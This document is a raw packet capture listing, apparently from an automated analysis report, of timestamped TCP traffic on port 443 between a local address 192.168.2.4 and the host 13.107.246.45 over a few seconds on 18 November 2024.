                                          Nov 18, 2024 23:44:59.395785093 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.526380062 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.526454926 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.526586056 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.527014971 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.527034044 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.527044058 CET57376443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.527050018 CET4435737613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.529870987 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.529911041 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.530028105 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.530184984 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.530190945 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.811806917 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.812513113 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.812588930 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.813096046 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.813126087 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.821718931 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.822118998 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.822158098 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.822602987 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.822618008 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.917812109 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.924590111 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.924676895 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.925544977 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.925559044 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.938093901 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.938560963 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.938652039 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.939244986 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.939260006 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.946700096 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.946830988 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.946897984 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.946970940 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.947010040 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.947040081 CET57379443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.947055101 CET4435737913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.949851036 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.949919939 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.950021982 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.950216055 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.950248003 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.965934038 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.966115952 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.966187000 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.966249943 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.966250896 CET57378443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.966281891 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.966304064 CET4435737813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.968722105 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.968760967 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:44:59.968835115 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.968981981 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:44:59.968992949 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058419943 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058474064 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058538914 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.058573961 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058604002 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058672905 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.058830023 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.058864117 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.058891058 CET57380443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.058904886 CET4435738013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.061594009 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.061628103 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.061714888 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.061928988 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.061944008 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.077680111 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.078113079 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.078201056 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.078288078 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.078288078 CET57381443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.078332901 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.078361988 CET4435738113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.080317020 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.080351114 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.080426931 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.080620050 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.080632925 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.283989906 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.284421921 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.284476995 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.284956932 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.284971952 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.417073011 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.417324066 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.417392969 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.417443991 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.417478085 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.417522907 CET57382443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.417541027 CET4435738213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.420289993 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.420314074 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.420389891 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.420624018 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.420634985 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.716975927 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.717472076 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.717519045 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.717888117 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.717897892 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.729227066 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.729644060 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.729657888 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.730009079 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.730012894 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.801364899 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.801697016 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.801712990 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.802160978 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.802167892 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.825475931 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.825752020 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.825771093 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.826112986 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.826117992 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.850234032 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.850286007 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.850399017 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.850464106 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.850514889 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.850569010 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.850569010 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.850569010 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.852940083 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.853030920 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.853112936 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.853255033 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.853281021 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864238977 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864298105 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864352942 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.864361048 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864396095 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.864511013 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.864516020 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864523888 CET57384443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.864542961 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.864653111 CET4435738413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.866499901 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.866532087 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.866595030 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.866688013 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.866698027 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947643995 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947694063 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947761059 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.947776079 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947815895 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947865963 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.947882891 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947894096 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.947894096 CET57385443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.947901964 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.947911024 CET4435738513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.949676991 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.949711084 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.949795008 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.949904919 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.949919939 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.955662012 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.955805063 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.955862045 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.955904961 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.955919981 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.955926895 CET57386443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.955931902 CET4435738613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.961817026 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.961848974 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:00.961926937 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.962040901 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:00.962054968 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.159969091 CET57383443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.160028934 CET4435738313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.181585073 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.182223082 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.182239056 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.182447910 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.182452917 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.319252014 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.319416046 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.319581032 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.319581032 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.319581032 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.321966887 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.321991920 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.322067022 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.322176933 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.322180986 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.534925938 CET57387443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.534956932 CET4435738713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.589134932 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.589823008 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.589849949 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.590516090 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.590529919 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.618725061 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.619411945 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.619431019 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.619760036 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.619772911 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.720848083 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.721153021 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.721259117 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.721353054 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.721353054 CET57388443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.721401930 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.721432924 CET4435738813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.724318027 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.724370003 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.724453926 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.724581957 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.724591970 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.728184938 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.728507042 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.728517056 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.729090929 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.729095936 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.774871111 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.775032043 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.775125980 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.775156975 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.775156975 CET57389443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.775171995 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.775181055 CET4435738913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.777993917 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.778026104 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.778119087 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.778326035 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.778333902 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.819681883 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.820205927 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.820239067 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.820830107 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.820842028 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.866368055 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.866517067 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.866667032 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.866688013 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.866700888 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.866713047 CET57391443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.866718054 CET4435739113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.869103909 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.869133949 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.869200945 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.869322062 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.869337082 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.969786882 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.971697092 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.971772909 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.971833944 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.971833944 CET57390443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.971858025 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.971878052 CET4435739013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.974308968 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.974328041 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:01.974406004 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.974560976 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:01.974571943 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.075793982 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.076236963 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.076256037 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.076872110 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.076877117 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.209907055 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.210064888 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.210150957 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.210333109 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.210349083 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.210383892 CET57392443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.210392952 CET4435739213.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.213762045 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.213819981 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.213910103 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.214040041 CET57397443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.214056969 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.477746010 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.478396893 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.478427887 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.479069948 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.479074955 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.543721914 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.544153929 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.544186115 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.544718981 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.544727087 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.601826906 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.602199078 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.602216005 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.602713108 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.602719069 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.611349106 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.611573935 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.611635923 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.611666918 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.611681938 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.611690998 CET57393443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.611696005 CET4435739313.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.614811897 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.614841938 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.614917994 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.615125895 CET57398443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.615137100 CET4435739813.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.724726915 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.725245953 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.725258112 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.725892067 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.725897074 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.727133036 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.727296114 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.727363110 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.727420092 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.727440119 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.727453947 CET57394443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.727459908 CET4435739413.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.730596066 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.730693102 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.730787992 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.730931997 CET57399443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.730967045 CET4435739913.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.731082916 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.731224060 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.731275082 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.731306076 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.731327057 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.731339931 CET57395443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.731344938 CET4435739513.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.733479023 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.733535051 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.733616114 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.733747959 CET57400443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.733764887 CET4435740013.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.861829996 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.861953974 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.862073898 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.862178087 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.862363100 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.862363100 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.864641905 CET57396443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.864650965 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.864658117 CET4435739613.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.864727974 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.864804029 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.864917994 CET57401443192.168.2.413.107.246.45
                                          Nov 18, 2024 23:45:02.864937067 CET4435740113.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.948400974 CET4435739713.107.246.45192.168.2.4
                                          Nov 18, 2024 23:45:02.948896885 CET57397443192.168.2.413.107.246.45
